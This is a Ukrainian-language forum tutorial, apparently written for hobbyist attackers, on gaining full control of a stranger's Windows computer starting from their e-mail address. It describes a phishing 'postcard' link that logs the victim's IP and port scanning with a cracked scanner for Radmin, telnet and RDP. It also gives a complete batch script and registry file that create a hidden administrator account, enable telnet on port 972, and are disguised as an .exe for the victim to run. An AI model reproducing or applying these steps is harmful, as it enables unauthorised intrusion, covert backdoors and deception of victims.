Доброго часу доби.

Я їхав на підкурси, але ось, повернувся на 2 дні (суботу та неділю) і вирішив написати статейку.

Стаття про те, як отримати повний доступ до вашого комп’ютера, знаючи тільки e-mail.
====================================================
Зміст:

1.) Передмова
2.) Дізнаємося IP
3.) Користуємося різними прог (аналіз отриманих даних)
4.) Якщо аналіз нічого не дав?
5.) Коротка теорія
6.) Післямова

====================================================
1.) Передмову.

Для того щоб скористатися цим методом, треба визначитися, чи потрібно це Вам у реальності, або Вам хочеться просто розважити себе і довести, що Ви — кращий(а). Останнє було для мене стимулом для того, щоб все це проробляти, але тепер я багато чого зрозумів, а головне — зрозумів те, що злом не повинен проводиться щоб довести оточуючим тебе людям, що ти «кулхацкер». Яким я себе не вважаю. Багато чого треба навчитися, і після практики, якщо все вийшло, на мій погляд, не треба від нічого робити зламувати чужі комп’ютери. Отже, сподіваюся з метою всі визначилися, перейдемо до дії?

====================================================
2.) Дізнаємося IP.

Сподіваюся ні для кого не секрет, що без IP, ми не зможемо знайти потрібний нам комп’ютер, і отже — провести злом. Так як же його дізнатися? (багато хто задається цим питанням і часто пишуть мені на аську). Дуже просто, нам потребуеются прямі руки, трохи фантазії і онлайн сніффер.
Багато використовують сніффер для відведення cookies (куків, печива, сесії — кому як подобається). Але в нашому випадку, cookies нас не цікавлять. Ми йдемо сюди і реєструємося, якщо раніше цього не робили.

hacker-pro.net/sniffer/

Відмінно. Пів справи зроблено. Тепер йдемо в «налаштування», при необхідності завантажуємо своє зображення. І нам дається посилання на сніффер, з перенаправленням (передавання) на нашу картинку. Не забудьте поставити галочку на «записувати IP в лог». Сподіваюся зрозуміли про що я? Ні?! Тоді читайте.
Сенс в тому, щоб дати цю посилання своєї «жертви», але лише з посиланням захованої в слові (вивчаємо html), а якщо в лом, то просто берете:

Тут пишіть будь-який текст, або одне слово

Пишіть який-небудь текст (включайте фантазію). Возьмеме найпростіше:

===========
Доброго дня! На Ваш E-mail адреса була отправленна листівка, щоб подивитися її, натисніть сюди
===========

Це було найлегше, раджу придумати щось більш оригінальне. Всю цю каламуть відправляєте жертві. При бажанні можна використовувати сервіси анонімної відправки пошти, або залити php скрипт, і самому зробити такий сервіс. Можете використовувати мій, але я можу його в будь-який момент відключити:

mqil.su/message/

Все, залишилося жертві ПЕРЕЙТИ «подивитися картинку», як IP палітся в балці.
Не треба нічого нікуди вводити, як у випадку з фейком. У результаті всі задоволені, він (вона), отримала свою листівку, а Ви IP.

====================================================
3.) Користуємося різними прог (аналіз отриманих даних)

Тепер у нас є головне, без чого була б неможлива подальша робота. Подальші дії — перевірити хост (комп’ютер) на наявність вразливостей — відкритих портів. Я для цих цілей використовую сканером [XSpider 7.5], Ви можете використовувати будь-який інший, на Ваш смак. Але краще всього використовувати декілька сканерів, що не покаже один — покаже інший.

Відразу качаємо собі [XSpider 7.5] звідси — depositfiles.com/files/tcdbrurxj
Оновлювати не рекомендую, так як версія, крякнутая, і повністю робоча.

Тепер, коли Ви завантажили його, необхідно налаштувати його — створити новий профіль. Хтось на сайті описував налаштування профілю, але щоб Вам не доводилося шукати статтю, я Вам опишу налаштування.

Відкриваєте сканер
>>>Профіль
>>>Новий…
>>>Коментар (пишіть що хочете)
>>>Йдете на вкладку «Сканер Портів», і внизу поруч з написом «default.prt» тисніть […]
>>>Вийде віконце, тисніть «новий»
>>>Порожній
>>>В коментах пишіть що завгодно
>>>внизу побачити «додати порти» і пишіть «4899» і «3389»
>>>”Зберегти як «4899».
>>>Довше виходьте назад на вкладки, і знімаєте звідусіль галки.

Точно також створюєте ще 1 профіль, тільки порт 23. Всі.

Тепер вбиваєте IP своєї жертви, в полі «додати хост» і починаєте сканувати. Якщо раптом відкритим виявився один з портів 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (віддалений робочий стіл) — пробуєте законектилися (підключитися). Пароль по дефолту 12345678, про це вже писалося. Найкраще (для мене), коли відкритий 4899 порт (Radmin). Підключилися? Радуйтсь!
Далі можете робити все, що Вашій душі завгодно. Далі читати не обов’язково.

але щоб не палитися, рекомендую Вам прибрати іконку в треї (поряд з годинником), і створити нового користувача з правами адміністратора. (про це, між іншим, теж писалося раніше) — не буду писати, а то стаття дуже велика вийде.

Remote Desktop входить в стандартну комплектацію Windows.
RAdmin Viewer можете завантажити тут depositfiles.com/files/92m5usz2b
В ньому ж є і telnet
P>S
RAdmin теж входить в стандартну комплектацію.

Якщо не вийшло підключитися, не впадаємо у відчай, читаємо далі.

=====================================================
4.) Якщо аналіз нічого не дав?

Якщо він нічого не дав, то можна своїми зусиллями допомогти собі. Робиться це просто, серверна частина встановлюється на віддалений комп’ютер/відкривається потрібний порт з потрібним логіном і паролем. Звичайно, але як встановити/відкрити, якщо комп’ютер далеко???

— А для чого інтернет?? WWW — World Wide Web — ВСЕСВІТНЯ павутина.
Через інтернет теж можна встановити програму на чужий комп’ютер/або відкрити доступ до вже існуючого.
Radmin якщо що, теж йде в стандартній комплектації Windows. А встановити, що це дійсно Windows, можна тим же сканером. Значить — нам залишається тільки відкрити доступ до цього сервісу (23). Про це до нас теж подбали, і написали ось такий *.txt файл, який згодом перейменували в *.bat.
Потім створюється ще один файл, файл конфігурації реєстру, який приховує нового користувача з очей, і його не видно у вікні привітання.

вміст *.bat файлу
++++
chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Адміністратори restot /add
net localgroup Користувачі SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
++++

Цим файлом Ви створюєте нового користувача з ім’ям restot і паролем 12345678
імпортуєте в реєстр налаштування, які приховають Ваше ім’я у вікні привітання.
відкриваєте 972 порт, і активуєте телнет через нього.

Записується без плюсиков в блокнот, потім змінюється на розширення *.bat

тепер вміст файлу conf.reg
++++
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftwindows
NTCurrentVersionWinlogonSpecialAccountsuserlis t]
«restot»=dword:00000000
++++

В останньому рядку, в лапках, пишіть ім’я, яке ви вказали в *.bat файлі.
також записуєте в блокнот, а потім міняєте на розширення *.reg

зберігаєте все це в одній папці, можна просто заархівувати обидва файли в один архів, а можна поступити розумніші, скомпілювати файл *.bat файл *.exe, і також додати в архів помінявши іконку, про це читайте у статтях на порталі. Після того як жертва запустить батник, можна буде коннектіться до 972 порту, або до будь-якого іншого, головне щоб не був зайнятий…

потім можна встановити те що треба через службу Telnet, і більш комфортно управляти віддаленою машиною.
==========================================================
5.) Коротка теориия|||
==================

знаходьте жертву >>> дізнаєтеся ip >>> перевіряєте на наявність відкритих портів >>> відкриваєте порти (якщо відкритих не було) >>> встановлюєте через telnet те що потрібно для зручність >>> здійснюєте свій жорстокий план…
==========================================================
6.) Післямова|||
==================
Стаття писалася пару місяців тому, я наисал початок, і зберіг в блокноті, зараз побачив, вирішив дописати і викласти Кінцівка не повна, але стаття орієнтована для трохи розуміють юзерів, тому розберетеся.
Стаття не є якимось унікальним способом зламати чужий комп’ютер, навіть не знаю, навіщо я її виклав. але тим не менш, якщо вона пройшла модерацію, і ви зараз читаєте, то знайте, що писалося щоб допомогти вам, читачам.

Конструктивна критика приймається, радий почути думку людей.
Всім спс за увагу, до нових зустрічей.